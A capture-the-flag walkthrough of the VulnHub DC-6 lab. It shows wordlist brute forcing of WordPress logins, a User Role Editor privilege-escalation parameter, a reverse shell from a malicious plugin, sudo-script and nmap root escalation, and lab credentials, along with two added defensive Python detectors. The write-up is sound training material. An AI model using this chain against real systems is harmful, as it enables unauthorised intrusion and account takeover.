Walkthrough of the DC-6 challenge from VulnHub. Initial hints from reviewing the challenge listing:
- The name of the host is wordy
- A password list can be determined using cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
A basic ping sweep finds the machine; a default nmap scan against it finds two ports of interest: SSH (22) and HTTP (80). Also of interest in the HTTP headers is the mention of the hostname wordy (in line with the initial hint).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:C3:AD:DB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
wordy is added to the /etc/hosts file, then off to have a look at the website.
A quick browse through the website shows it to be a fairly basic WordPress site. Checking it with wpscan reveals a few things of use.
root@kali:/var/www/html# wpscan --url http://wordy
_______________________________________________________________
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://wordy/
[+] Started: Tue May 14 20:30:56 2019

[+] Interesting header: LINK: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://wordy/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.25 (Debian)
[+] XML-RPC Interface available under: http://wordy/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://wordy/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| admin |
+-------+
[!] Includes directory has directory listing enabled: http://wordy/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 5.1.1 (Released on 2019-03-13) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v2.1

[+] Name: twentyseventeen - v2.1
 |  Last updated: 2019-05-07T00:00:00.000Z
 |  Location: http://wordy/wp-content/themes/twentyseventeen/
 |  Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
[!] The version is out of date, the latest version is 2.2
 |  Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
From the initial output no obvious vulnerabilities are identified: it's a reasonably recent WordPress install with no detected plugins. As a next step the user accounts are brute forced against the login using the password list created from the hints (command: wpscan --url http://wordy/ --wordlist /root/Documents/DC-6/passwords.txt).
[+] Enumerating usernames ...
[+] We identified the following 5 users:
+----+--------+-----------------+
| ID | Login  | Name            |
+----+--------+-----------------+
| 1  | admin  | admin           |
| 2  | graham | Graham Bond     |
| 3  | mark   | Mark Jones      |
| 4  | sarah  | Sarah Balin     |
| 5  | jens   | Jens Dagmeister |
+----+--------+-----------------+
[!] Default first WordPress username 'admin' is still used

[+] Starting the password brute forcer
  Brute Forcing 'admin'  Time: 00:00:50 <==  > (2668 / 2669) 99.96%  ETA: 00:00:00
  Brute Forcing 'graham' Time: 00:00:39 <=   > (2668 / 2669) 99.96%  ETA: 00:00:00
  [+] [SUCCESS] Login : mark Password : helpdesk01
  Brute Forcing 'sarah'  Time: 00:00:40 <==  > (2666 / 2669) 99.88%  ETA: 00:00:00
  Brute Forcing 'jens'   Time: 00:00:46 <=== > (2663 / 2669) 99.77%  ETA: 00:00:00

+----+--------+-----------------+------------+
| ID | Login  | Name            | Password   |
+----+--------+-----------------+------------+
| 1  | admin  | admin           |            |
| 2  | graham | Graham Bond     |            |
| 3  | mark   | Mark Jones      | helpdesk01 |
| 4  | sarah  | Sarah Balin     |            |
| 5  | jens   | Jens Dagmeister |            |
+----+--------+-----------------+------------+
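Seen from the blue side, a run like that leaves an obvious trace in the web server log: a burst of POSTs to wp-login.php (or xmlrpc.php) from one address in well under a minute. The following is an added example, not part of the walkthrough, that counts login POSTs per source IP over a sliding window of Apache combined-format log lines and raises one alert per offending address. The log lines, addresses and user agent string are constructed for the sample, and the threshold and window are assumptions to tune for your own traffic.

```python
"""Detect password-guessing bursts against WordPress login endpoints in
Apache combined-format access logs. Added example, not the walkthrough's
code; the sample lines, addresses and user agent below are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Both endpoints accept credentials; xmlrpc.php is the usual way round
# rate limits applied only to wp-login.php.
LOGIN_ENDPOINTS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def detect_login_bursts(lines, threshold=10, window_seconds=60):
    """Alert once per source IP that sends >= threshold login POSTs inside the window.

    Lines are expected in time order, as they are in a live log."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    alerts, alerted = [], set()
    for raw in lines:
        ev = parse_line(raw)
        if ev is None or ev["method"] != "POST":
            continue
        if ev["path"].split("?", 1)[0] not in LOGIN_ENDPOINTS:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # drop events older than the window
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in alerted:
            alerted.add(ev["ip"])
            alerts.append({"ip": ev["ip"], "count": len(q), "first": q[0],
                           "last": ev["ts"], "ua": ev["ua"]})
    return alerts


def make_line(ip, ts, method, path, status, ua):
    """Build one constructed combined-format line for the sample below."""
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 4213 "-" "{ua}"'


# Constructed sample: twelve guesses two seconds apart from one scanner address,
# plus normal traffic from a second address (a single login POST is not a burst).
_T0 = datetime(2019, 5, 14, 20, 31, 0, tzinfo=timezone.utc)
SAMPLE_LOG = [
    make_line("192.0.2.10", _T0 + timedelta(seconds=2 * i), "POST", "/wp-login.php", 200, "WPScan v2.9.4")
    for i in range(12)
] + [
    make_line("192.0.2.77", _T0 + timedelta(seconds=5), "GET", "/index.php/feed/", 200, "Mozilla/5.0"),
    make_line("192.0.2.77", _T0 + timedelta(seconds=40), "POST", "/wp-login.php", 302, "Mozilla/5.0"),
]
SAMPLE_LOG.sort(key=lambda l: parse_line(l)["ts"])   # keep the sample in log order

if __name__ == "__main__":
    for a in detect_login_bursts(SAMPLE_LOG):
        print(f"[!] {a['ip']}: {a['count']} login POSTs between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S} (UA: {a['ua']})")
```

On a stock install a failed wp-login.php POST answers 200 with the form redisplayed while a success answers 302, so the status field can narrow the rule to failures only if the burst count alone proves too noisy. The fix for the finding itself is the usual one: rate limit or lock out on wp-login.php and xmlrpc.php, disable XML-RPC if nothing needs it, and retire the default admin account name that wpscan flagged above.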
Credentials for user mark are successfully identified. Logging into the site shows user mark has a limited set of privileges. Reviewing the install shows a few plugins installed that wpscan failed to pick up. One of interest is User Role Editor version 4.24. Researching the plugin version shows a low privilege user can exploit the plugin to gain admin privileges: https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/.
Reviewing the sample exploit code at https://www.exploit-db.com/exploits/44595 and https://packetstormsecurity.com/files/147515/WordPress-User-Role-Editor-Plugin-Privilege-Escalation.html shows that the HTTP POST parameter ure_other_roles=["role1", "role2"] can be added to a user profile update request to grant the additional roles role1 and role2 to the logged in user.
The route to a low privilege shell on the box is a custom malicious WordPress plugin. For this the logged in user needs to be able to upload and activate new plugins. A review of https://codex.wordpress.org/Roles_and_Capabilities suggests the additional roles needed are:
A profile update request sent with the additional roles added now lets our user upload plugins.
Loading the malicious plugin and activating it gives us a low privilege shell on the machine.
root@kali-2018:~/Documents/DC-6# nc -lvp 5556
listening on [any] 5556 ...
connect to [192.168.139.131] from wordy [192.168.139.134] 38870
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
 21:13:15 up 1:28, 0 users, load average: 0.01, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
whoami
www-data
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname
uname
Linux
$ uname -a
uname -a
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
$ cat /etc/issue
cat /etc/issue
Debian GNU/Linux 9 \n \l
Browsing through the machine the following file of interest is identified.
$ cat things-to-do.txt
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
SSH into the box using that username and password succeeds; now on to escalating privileges and the root flag.
Initial enumeration work as user graham identifies the following items of interest.
- User graham can run the command /home/jens/backups.sh as user jens via sudo with no password.
- User graham is in the devs group and can therefore write to the file /home/jens/backups.sh (group writable, owned by jens:devs).
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:~$ ls -al /home/jens/backups.sh
-rwxrwxr-x 1 jens devs 50 Apr 26 02:19 /home/jens/backups.sh
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
This arrangement is dangerous: because graham can rewrite the script that sudo lets him run as jens, the rule is effectively "graham may run anything as jens". Let's do that.
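The same mistake is easy to audit for on a host you administer: every command path in a sudoers rule must not be writable by the user the rule is granted to, whether directly, through group membership or through world-writable bits. Below is an added example (not the walkthrough's code) that parses the text of sudo -l, as printed above for graham, and flags any rule whose target the invoking user could modify. The file metadata is supplied as a dict standing in for stat() so the check runs offline; the second sudo rule and its metadata are constructed as a non-finding for contrast.

```python
"""Audit 'sudo -l' output for rules whose target executable the invoking user
can modify. Added example, not the DC-6 author's code. The sudo -l text is
the one printed for graham in the walkthrough plus one constructed safe rule;
the FILES dict stands in for stat() so the audit runs without the box."""
import re
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class FileMeta:
    mode: int    # permission bits, as in st_mode & 0o777
    owner: str
    group: str


@dataclass(frozen=True)
class SudoRule:
    runas: str
    nopasswd: bool
    command: str  # first token of the command spec, i.e. the executable path


# One "(runas) [NOPASSWD:] /path args, /path2 ..." line as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:(?P<tag>NOPASSWD|PASSWD):\s*)?(?P<cmds>\S.*)$")


def parse_sudo_l(text: str) -> list:
    """Return the rules listed after the 'may run the following commands' line."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            if spec:
                rules.append(SudoRule(m.group("runas"), m.group("tag") == "NOPASSWD", spec.split()[0]))
    return rules


def writable_by(meta: FileMeta, user: str, groups: set) -> bool:
    """True if a user with the given group memberships may write the file."""
    if meta.owner == user and meta.mode & stat.S_IWUSR:
        return True
    if meta.group in groups and meta.mode & stat.S_IWGRP:
        return True
    return bool(meta.mode & stat.S_IWOTH)


def audit(sudo_text: str, user: str, groups: set, files: dict) -> list:
    """Flag every rule whose executable the invoking user can rewrite (or is missing).

    A writable target turns the rule into '(runas) ALL': whatever the user puts
    in the file runs under the runas identity."""
    findings = []
    for rule in parse_sudo_l(sudo_text):
        meta = files.get(rule.command)
        if meta is None:
            findings.append((rule.command, rule.runas, "target does not exist"))
        elif writable_by(meta, user, groups):
            findings.append((rule.command, rule.runas, f"writable by {user}"))
    return findings


# Text of 'sudo -l' for graham from the walkthrough, plus one constructed safe rule.
SUDO_L_GRAHAM = """\
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
    (root) /usr/bin/systemctl restart apache2
"""

# Constructed metadata mirroring 'ls -al /home/jens/backups.sh' (-rwxrwxr-x jens devs);
# /usr/bin/systemctl is root-owned and neither group nor world writable.
FILES = {
    "/home/jens/backups.sh": FileMeta(0o775, "jens", "devs"),
    "/usr/bin/systemctl": FileMeta(0o755, "root", "root"),
}

if __name__ == "__main__":
    for path, runas, why in audit(SUDO_L_GRAHAM, "graham", {"graham", "devs"}, FILES):
        print(f"[!] {path} runs as {runas} via sudo but {why}")
```

On a real host the FILES dict would be replaced by os.stat() plus a uid/gid lookup, and the group set by the output of id. The remediation for a hit is to make the script unwritable by anyone other than its run-as owner (here jens, or better root with mode 0755), since the sudoers line itself is not the problem.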
Swapping out the contents of /home/jens/backups.sh with /bin/bash and running it via sudo switches us over to user jens. From there it's confirmed that user jens can run nmap as root with no password, which can be used to spawn a root shell (see https://gtfobins.github.io/gtfobins/nmap/ for how).
Root flag obtained.
From enumerating the machine the following post-exploitation items of interest were identified. When attempting to crack hashes, https://hashcat.net/wiki/doku.php?id=example_hashes is useful for identifying the type of hash.
#1 – Mysql database credentials:
define( 'DB_NAME', 'wordpressdb' );

/** MySQL database username */
define( 'DB_USER', 'wpdbuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'meErKatZ' );
#2 – WordPress password hashes. These were extracted from the database using the credentials found at item #1.
Running hashcat against the list so far only recovers the user password for mark (helpdesk01).